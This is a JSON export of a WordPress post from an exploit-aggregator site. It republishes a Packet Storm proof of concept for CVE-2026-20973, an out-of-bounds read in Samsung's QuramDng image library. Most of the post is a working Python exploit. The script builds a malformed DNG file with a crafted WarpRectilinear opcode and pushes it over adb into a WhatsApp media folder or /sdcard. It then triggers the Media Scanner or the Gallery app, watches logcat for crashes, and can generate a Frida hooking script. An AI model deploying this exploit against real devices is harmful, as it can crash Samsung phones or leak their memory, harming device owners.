{"id":39821,"date":"2026-02-09T10:52:42","date_gmt":"2026-02-09T10:52:42","guid":{"rendered":"http:\/\/localhost\/?p=39821"},"modified":"2026-02-09T10:52:42","modified_gmt":"2026-02-09T10:52:42","slug":"samsung-quramdng-warp-out-of-bounds-read","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=39821","title":{"rendered":"\ud83d\udcc4 Samsung QuramDng Warp Out-Of-Bounds Read_PACKETSTORM:215157"},"content":{"rendered":"

{“lastseen”:”2026-02-09T16:18:39″,”description”:”This python proof of concept demonstrates an out-of-bounds read vulnerability in Samsung’s QuramDng image processing library, triggered via a specially crafted DNG Digital Negative file. The script programmatically builds a minimal but valid DNG file…”,”published”:”2026-02-09T00:00:00″,”modified”:”2026-02-09T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Samsung QuramDng Warp Out-Of-Bounds Read”,”source”:””,”references”:””,”id”:”PACKETSTORM:215157″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-20973″],”sourceData”:”=============================================================================================================================================\\n | # Title : Samsung QuramDng Warp OOB Read PoC |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 147.0.1 (64 bits) |\\n | # Vendor : https:\/\/www.samsung.com\/n_africa\/ |\\n =============================================================================================================================================\\n \\n [+] References : https:\/\/packetstorm.news\/files\/id\/215033\/ \\u0026 CVE-2026-20973\\n \\n [+] Summary : This Python proof of concept demonstrates an out-of-bounds (OOB) read vulnerability in Samsung\u2019s QuramDng image processing library, triggered via a specially crafted DNG (Digital Negative) file.\\n The script programmatically builds a minimal but valid DNG file containing a malformed WarpRectilinear opcode, designed to provoke unsafe memory access when processed by Samsung components such as Media Scanner (ipservice) or the Gallery app.\\n \\n [+] The PoC includes:\\n \\n Automatic creation of the malicious DNG file.\\n \\n Multiple trigger methods (Media Scanner or Gallery).\\n \\n Logcat-based crash monitoring to detect SIGSEGV or QuramDng-related faults.\\n \\n Optional generation of a Frida JavaScript monitoring script to observe Warp-related function calls at runtime.\\n \\n [+]PoC : python poc.py\\n \\n #!\/usr\/bin\/env python3\\n \\n import struct\\n import os\\n import subprocess\\n import sys\\n import time\\n \\n \\n \\n def create_dng_file(filename=\\”exploit.dng\\”, width=3, height=3):\\n \\”\\”\\”\\n \\n \\”\\”\\”\\n print(f\\”[+] Creating DNG {width}x{height}\\”)\\n \\n data = bytearray()\\n data.extend(b’II’) \\n data.extend(struct.pack(‘\\u003cH’, 42)) \\n data.extend(struct.pack(‘\\u003cI’, 8)) \\n data.extend(struct.pack(‘\\u003cH’, 7))\\n data.extend(struct.pack(‘\\u003cHH’, 256, 4)) \\n data.extend(struct.pack(‘\\u003cI’, 1)) \\n data.extend(struct.pack(‘\\u003cI’, width)) \\n data.extend(struct.pack(‘\\u003cHH’, 257, 4))\\n data.extend(struct.pack(‘\\u003cI’, 1))\\n data.extend(struct.pack(‘\\u003cI’, height))\\n data.extend(struct.pack(‘\\u003cHH’, 258, 3)) \\n data.extend(struct.pack(‘\\u003cI’, 3)) \\n bps_offset = 8 + 2 + (7 * 12) + 4 + 6 \\n data.extend(struct.pack(‘\\u003cI’, bps_offset))\\n data.extend(struct.pack(‘\\u003cHH’, 259, 3))\\n data.extend(struct.pack(‘\\u003cI’, 1))\\n data.extend(struct.pack(‘\\u003cH’, 1)) \\n data.extend(b’\\\\x00\\\\x00′)\\n data.extend(struct.pack(‘\\u003cHH’, 262, 3))\\n data.extend(struct.pack(‘\\u003cI’, 1))\\n data.extend(struct.pack(‘\\u003cH’, 2)) \\n data.extend(b’\\\\x00\\\\x00′)\\n data.extend(struct.pack(‘\\u003cHH’, 273, 4))\\n data.extend(struct.pack(‘\\u003cI’, 1))\\n strip_offset = bps_offset + 6 + (width * height * 3 * 2) + 100\\n data.extend(struct.pack(‘\\u003cI’, strip_offset))\\n data.extend(struct.pack(‘\\u003cHH’, 51024, 1)) \\n opcode_size = 100\\n data.extend(struct.pack(‘\\u003cI’, opcode_size))\\n opcode_offset = bps_offset + 6\\n data.extend(struct.pack(‘\\u003cI’, opcode_offset))\\n data.extend(struct.pack(‘\\u003cI’, 0))\\n \\n while len(data) \\u003c bps_offset:\\n data.extend(b’\\\\x00′)\\n data.extend(struct.pack(‘\\u003cHHH’, 16, 16, 16))\\n \\n while len(data) \\u003c opcode_offset:\\n data.extend(b’\\\\x00′)\\n \\n opcode = bytearray()\\n opcode.extend(struct.pack(‘\\u003cH’, 9)) \\n opcode.extend(struct.pack(‘\\u003cH’, 1)) \\n opcode.extend(struct.pack(‘\\u003cI’, 0)) \\n opcode.extend(struct.pack(‘\\u003cI’, 3))\\n opcode.extend(struct.pack(‘\\u003cI’, 0)) \\n opcode.extend(struct.pack(‘\\u003cI’, 0)) \\n opcode.extend(struct.pack(‘\\u003cI’, height)) \\n opcode.extend(struct.pack(‘\\u003cI’, width)) \\n opcode.extend(struct.pack(‘\\u003cf’, 0.0))\\n opcode.extend(struct.pack(‘\\u003cf’, 0.0))\\n \\n for i in range(8):\\n val = 1000.0 if i == 0 else 1.0\\n opcode.extend(struct.pack(‘\\u003cf’, val))\\n for _ in range(3 * 3):\\n opcode.extend(struct.pack(‘\\u003cf’, 1.0))\\n if len(opcode) \\u003c opcode_size:\\n opcode.extend(b’\\\\xCC’ * (opcode_size – len(opcode)))\\n \\n data.extend(opcode)\\n \\n for y in range(height):\\n for x in range(width):\\n for c in range(3): \\n value = (y \\u003c\\u003c 8) | x | (c \\u003c\\u003c 12)\\n data.extend(struct.pack(‘\\u003cH’, value))\\n \\n data.extend(b’OOB_DATA:START’)\\n for i in range(512):\\n data.extend(struct.pack(‘B’, (i % 26) + 65)) # A-Z pattern\\n \\n with open(filename, ‘wb’) as f:\\n f.write(data)\\n \\n print(f\\”[+] Created {filename} ({len(data)} bytes)\\”)\\n return filename\\n \\n def check_adb():\\n \\”\\”\\”Check ADB connection\\”\\”\\”\\n try:\\n result = subprocess.run([‘adb’, ‘devices’], \\n capture_output=True, text=True, timeout=5)\\n return ‘device’ in result.stdout\\n except:\\n return False\\n \\n def push_file(local_file, remote_path):\\n \\”\\”\\”Push file to device\\”\\”\\”\\n try:\\n \\n remote_dir = os.path.dirname(remote_path)\\n if remote_dir:\\n subprocess.run([‘adb’, ‘shell’, ‘mkdir’, ‘-p’, remote_dir],\\n capture_output=True)\\n \\n result = subprocess.run([‘adb’, ‘push’, local_file, remote_path],\\n capture_output=True, text=True, timeout=30)\\n return result.returncode == 0\\n except:\\n return False\\n \\n def trigger_media_scanner(file_path):\\n \\”\\”\\”Trigger Media Scanner\\”\\”\\”\\n try:\\n cmd = [\\n ‘adb’, ‘shell’, ‘am’, ‘broadcast’,\\n ‘-a’, ‘android.intent.action.MEDIA_SCANNER_SCAN_FILE’,\\n ‘-d’, f’file:\/\/{file_path}’\\n ]\\n result = subprocess.run(cmd, capture_output=True, text=True, timeout=10)\\n return result.returncode == 0\\n except:\\n return False\\n \\n def open_with_gallery(file_path):\\n \\”\\”\\”Open file with Gallery\\”\\”\\”\\n try:\\n cmd = [\\n ‘adb’, ‘shell’, ‘am’, ‘start’,\\n ‘-a’, ‘android.intent.action.VIEW’,\\n ‘-t’, ‘image\/x-adobe-dng’,\\n ‘-d’, f’file:\/\/{file_path}’,\\n ‘com.samsung.gallery3d’\\n ]\\n result = subprocess.run(cmd, capture_output=True, text=True, timeout=10)\\n return result.returncode == 0\\n except:\\n return False\\n \\n def monitor_logs(timeout=120):\\n \\”\\”\\”\\n Monitor logs for crashes related to QuramDng\\n Simple and reliable version\\n \\”\\”\\”\\n print(f\\”[*] Monitoring logs for {timeout} seconds…\\”)\\n print(\\”[*] Press Ctrl+C to stop\\”)\\n \\n try:\\n subprocess.run([‘adb’, ‘logcat’, ‘-c’], capture_output=True)\\n \\n cmd = [‘adb’, ‘logcat’, ‘-s’, ‘libc:V’, ‘DEBUG:V’]\\n proc = subprocess.Popen(cmd,\\n stdout=subprocess.PIPE,\\n stderr=subprocess.PIPE,\\n text=True,\\n bufsize=1,\\n universal_newlines=True)\\n \\n start_time = time.time()\\n interesting = []\\n \\n while time.time() – start_time \\u003c timeout:\\n if proc.poll() is not None:\\n break\\n \\n try:\\n line = proc.stdout.readline()\\n if not line:\\n time.sleep(0.1)\\n continue\\n \\n line = line.strip()\\n \\n if any(keyword in line for keyword in [\\n ‘SIGSEGV’, ‘Fatal signal’, ‘libimagecodec’,\\n ‘QuramDng’, ‘Warp’, ‘out-of-bounds’\\n ]):\\n interesting.append(line)\\n print(f\\”[!] {line}\\”)\\n if ‘libimagecodec.quram’ in line:\\n print(\\”[+] QuramDng library involved!\\”)\\n \\n if ‘backtrace:’ in line:\\n print(\\”[+] Crash backtrace detected\\”)\\n \\n # Read next few lines for backtrace\\n for _ in range(20):\\n try:\\n bt_line = proc.stdout.readline().strip()\\n if bt_line and bt_line.startswith(‘#’):\\n print(f\\” {bt_line}\\”)\\n except:\\n break\\n elapsed = int(time.time() – start_time)\\n if elapsed % 10 == 0:\\n print(f\\”[*] {elapsed}\/{timeout}s\\”, end=’\\\\r’, flush=True)\\n \\n except (KeyboardInterrupt, EOFError):\\n print(\\”\\\\n[*] Stopped by user\\”)\\n break\\n except:\\n continue\\n try:\\n proc.terminate()\\n proc.wait(timeout=2)\\n except:\\n pass\\n \\n print(f\\”\\\\n[*] Monitoring complete\\”)\\n \\n if interesting:\\n print(f\\”[*] Found {len(interesting)} interesting lines\\”)\\n return True, interesting\\n else:\\n print(\\”[-] No interesting logs found\\”)\\n return False, []\\n \\n except Exception as e:\\n print(f\\”[-] Monitoring error: {e}\\”)\\n return False, []\\n \\n def generate_frida_script():\\n \\”\\”\\”\\n Generate correct Frida JavaScript for monitoring\\n \\”\\”\\”\\n js_code = \\”\\”\\”\/*\\n * Frida Script for QuramDng Monitoring\\n * Simple and working version\\n *\/\\n \\n console.log(\\”[+] Starting QuramDng monitor…\\”);\\n \\n var libName = \\”libimagecodec.quram.so\\”;\\n var found = false;\\n var interval = setInterval(function() {\\n var modules = Process.enumerateModules();\\n \\n for (var i = 0; i \\u003c modules.length; i++) {\\n var module = modules[i];\\n if (module.name \\u0026\\u0026 module.name.indexOf(libName) !== -1) {\\n console.log(\\”[+] Library found: \\” + module.name);\\n console.log(\\” Base: \\” + module.base);\\n found = true;\\n clearInterval(interval);\\n hookFunctions(module);\\n break;\\n }\\n }\\n \\n if (!found) {\\n console.log(\\”[*] Waiting for \\” + libName + \\”…\\”);\\n }\\n }, 1000);\\n \\n function hookFunctions(module) {\\n console.log(\\”[+] Looking for functions…\\”);\\n \\n var symbols = module.enumerateSymbols();\\n var targets = [];\\n \\n symbols.forEach(function(symbol) {\\n var name = symbol.name || \\”\\”;\\n if (name.indexOf(\\”Warp\\”) !== -1) {\\n targets.push({\\n name: name,\\n address: symbol.address\\n });\\n }\\n });\\n \\n console.log(\\”[+] Found \\” + targets.length + \\” Warp functions\\”);\\n \\n targets.forEach(function(target) {\\n try {\\n Interceptor.attach(target.address, {\\n onEnter: function(args) {\\n console.log(\\”\\\\\\\\n[+] \\” + target.name + \\” called\\”);\\n this.startTime = Date.now();\\n },\\n \\n onLeave: function(retval) {\\n var duration = Date.now() – this.startTime;\\n console.log(\\”[+] \\” + target.name + \\” returned (\\” + duration + \\”ms)\\”);\\n }\\n });\\n console.log(\\” [*] Hooked: \\” + target.name);\\n } catch(e) {\\n console.log(\\” [-] Failed to hook \\” + target.name + \\”: \\” + e);\\n }\\n });\\n \\n console.log(\\”\\\\\\\\n[+] Monitoring active. Process DNG to see activity.\\”);\\n }\\n \\n setTimeout(function() {\\n console.log(\\”[+] Monitor timeout reached\\”);\\n clearInterval(interval);\\n }, 600000);\\n \\”\\”\\”\\n \\n filename = \\”monitor.js\\”\\n with open(filename, ‘w’) as f:\\n f.write(js_code)\\n \\n print(f\\”[+] Frida script saved to {filename}\\”)\\n print(\\”\\\\nUsage:\\”)\\n print(\\” 1. Start Frida server on device:\\”)\\n print(\\” adb shell \/data\/local\/tmp\/frida-server \\u0026\\”)\\n print(\\” 2. Run monitor:\\”)\\n print(\\” frida -U com.samsung.ipservice -l monitor.js\\”)\\n \\n return filename\\n \\n def main():\\n \\”\\”\\”Main program – simple and reliable\\”\\”\\”\\n print(\\”=\\” * 60)\\n print(\\”Samsung QuramDng Warp OOB Read PoC\\”)\\n print(\\”CVE-2026-20973\\”)\\n print(\\”=\\” * 60)\\n \\n print(\\”\\\\n[*] Checking ADB…\\”)\\n if not check_adb():\\n print(\\”[-] ADB not connected\\”)\\n print(\\”\\\\nPlease:\\”)\\n print(\\”1. Enable USB debugging\\”)\\n print(\\”2. Connect device\\”)\\n print(\\”3. Accept debugging prompt\\”)\\n return\\n print(\\”[+] ADB connected\\”)\\n \\n print(\\”\\\\n[*] Creating DNG file…\\”)\\n try:\\n dng_file = create_dng_file()\\n except Exception as e:\\n print(f\\”[-] Failed to create DNG: {e}\\”)\\n return\\n \\n print(\\”\\\\nChoose method:\\”)\\n print(\\”1. Media Scanner (ipservice – automatic)\\”)\\n print(\\”2. Gallery (manual – immediate)\\”)\\n print(\\”3. Just create file\\”)\\n print(\\”4. Generate Frida script\\”)\\n \\n choice = input(\\”\\\\nChoice [1-4]: \\”).strip()\\n \\n if choice == \\”1\\”:\\n \\n print(\\”\\\\n[*] Using Media Scanner method…\\”)\\n \\n remote_path = \\”\/sdcard\/Android\/media\/com.whatsapp\/WhatsApp\/Media\/WhatsApp Images\/exploit.dng\\”\\n if push_file(dng_file, remote_path):\\n print(\\”[+] File pushed\\”)\\n \\n if trigger_media_scanner(remote_path):\\n print(\\”[+] Media Scanner triggered\\”)\\n print(\\”[*] ipservice will process in ~5 minutes\\”)\\n print(\\”\\\\n[*] Starting log monitor…\\”)\\n success, logs = monitor_logs(180) # 3 minutes\\n \\n if success:\\n print(\\”\\\\n[+] Possible crash detected!\\”)\\n else:\\n print(\\”\\\\n[-] No crash detected in monitoring period\\”)\\n else:\\n print(\\”[-] Failed to trigger Media Scanner\\”)\\n else:\\n print(\\”[-] Failed to push file\\”)\\n \\n elif choice == \\”2\\”:\\n \\n print(\\”\\\\n[*] Using Gallery method…\\”)\\n \\n remote_path = \\”\/sdcard\/exploit.dng\\”\\n if push_file(dng_file, remote_path):\\n print(\\”[+] File pushed\\”)\\n \\n if open_with_gallery(remote_path):\\n print(\\”[+] Gallery opened\\”)\\n print(\\”[*] Gallery will process the DNG\\”)\\n print(\\”\\\\n[*] Monitoring for 30 seconds…\\”)\\n success, logs = monitor_logs(30)\\n \\n if success:\\n print(\\”\\\\n[+] Possible crash detected!\\”)\\n else:\\n print(\\”\\\\n[-] No crash detected\\”)\\n else:\\n print(\\”[-] Failed to open Gallery\\”)\\n else:\\n print(\\”[-] Failed to push file\\”)\\n \\n elif choice == \\”3\\”:\\n print(f\\”\\\\n[+] File created: {dng_file}\\”)\\n print(\\”\\\\nTo test manually:\\”)\\n print(f\\” adb push {dng_file} \/sdcard\/\\”)\\n print(f\\” adb shell am start -a android.intent.action.VIEW \\\\\\\\\\”)\\n print(f\\” -t image\/x-adobe-dng -d file:\/\/\/sdcard\/{os.path.basename(dng_file)}\\”)\\n \\n elif choice == \\”4\\”:\\n generate_frida_script()\\n \\n else:\\n print(\\”[-] Invalid choice\\”)\\n \\n print(\\”\\\\n[*] Cleaning up…\\”)\\n try:\\n # Remove local file\\n if os.path.exists(dng_file):\\n os.remove(dng_file)\\n print(f\\”[+] Removed {dng_file}\\”)\\n \\n subprocess.run([‘adb’, ‘shell’, ‘rm’, ‘-f’,\\n ‘\/sdcard\/exploit.dng’,\\n ‘\/sdcard\/Android\/media\/com.whatsapp\/WhatsApp\/Media\/WhatsApp Images\/exploit.dng’],\\n capture_output=True)\\n print(\\”[+] Cleaned device files\\”)\\n except:\\n pass\\n \\n print(\\”\\\\n\\” + \\”=\\” * 60)\\n print(\\”Done\\”)\\n print(\\”=\\” * 60)\\n \\n if __name__ == \\”__main__\\”:\\n try:\\n main()\\n except KeyboardInterrupt:\\n print(\\”\\\\n\\\\n[*] Interrupted by user\\”)\\n except Exception as e:\\n print(f\\”\\\\n[-] Error: {e}\\”)\\n import traceback\\n traceback.print_exc()\\n \\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/215157″,”cvss”:{“score”:9.1,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:N\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/215157\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2026-02-09T16:18:39″,”description”:”This python proof of concept demonstrates an out-of-bounds read vulnerability in Samsung’s QuramDng image processing library, triggered via a specially crafted DNG Digital Negative file….<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,10,12,13,53,7,11,5],"class_list":["post-39821","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-91","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n\ud83d\udcc4 Samsung QuramDng Warp Out-Of-Bounds Read_PACKETSTORM:215157 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=39821\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 Samsung QuramDng Warp Out-Of-Bounds Read_PACKETSTORM:215157 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2026-02-09T16:18:39″,”description”:”This python proof of concept demonstrates an out-of-bounds read vulnerability in Samsung’s QuramDng image processing library, triggered via a specially crafted DNG Digital Negative file....\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=39821\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-02-09T10:52:42+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"12 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=39821#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=39821\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 Samsung QuramDng Warp Out-Of-Bounds Read_PACKETSTORM:215157\",\"datePublished\":\"2026-02-09T10:52:42+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=39821\"},\"wordCount\":2275,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CRITICAL\",\"CVE\",\"CVSS\",\"CVSS-9.1\",\"exploit\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=39821#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=39821\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=39821\",\"name\":\"\ud83d\udcc4 Samsung QuramDng Warp Out-Of-Bounds Read_PACKETSTORM:215157 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-02-09T10:52:42+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=39821#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=39821\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=39821#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 Samsung QuramDng Warp Out-Of-Bounds Read_PACKETSTORM:215157\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 Samsung QuramDng Warp Out-Of-Bounds Read_PACKETSTORM:215157 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=39821","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 Samsung QuramDng Warp Out-Of-Bounds Read_PACKETSTORM:215157 - zero redgem","og_description":"{“lastseen”:”2026-02-09T16:18:39″,”description”:”This python proof of concept demonstrates an out-of-bounds read vulnerability in Samsung’s QuramDng image processing library, triggered via a specially crafted DNG Digital Negative file....","og_url":"https:\/\/zero.redgem.net\/?p=39821","og_site_name":"zero redgem","article_published_time":"2026-02-09T10:52:42+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"12 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=39821#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=39821"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 Samsung QuramDng Warp Out-Of-Bounds Read_PACKETSTORM:215157","datePublished":"2026-02-09T10:52:42+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=39821"},"wordCount":2275,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CRITICAL","CVE","CVSS","CVSS-9.1","exploit","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=39821#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=39821","url":"https:\/\/zero.redgem.net\/?p=39821","name":"\ud83d\udcc4 Samsung QuramDng Warp Out-Of-Bounds Read_PACKETSTORM:215157 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-02-09T10:52:42+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=39821#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=39821"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=39821#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 Samsung QuramDng Warp Out-Of-Bounds Read_PACKETSTORM:215157"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/39821","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=39821"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/39821\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=39821"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=39821"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp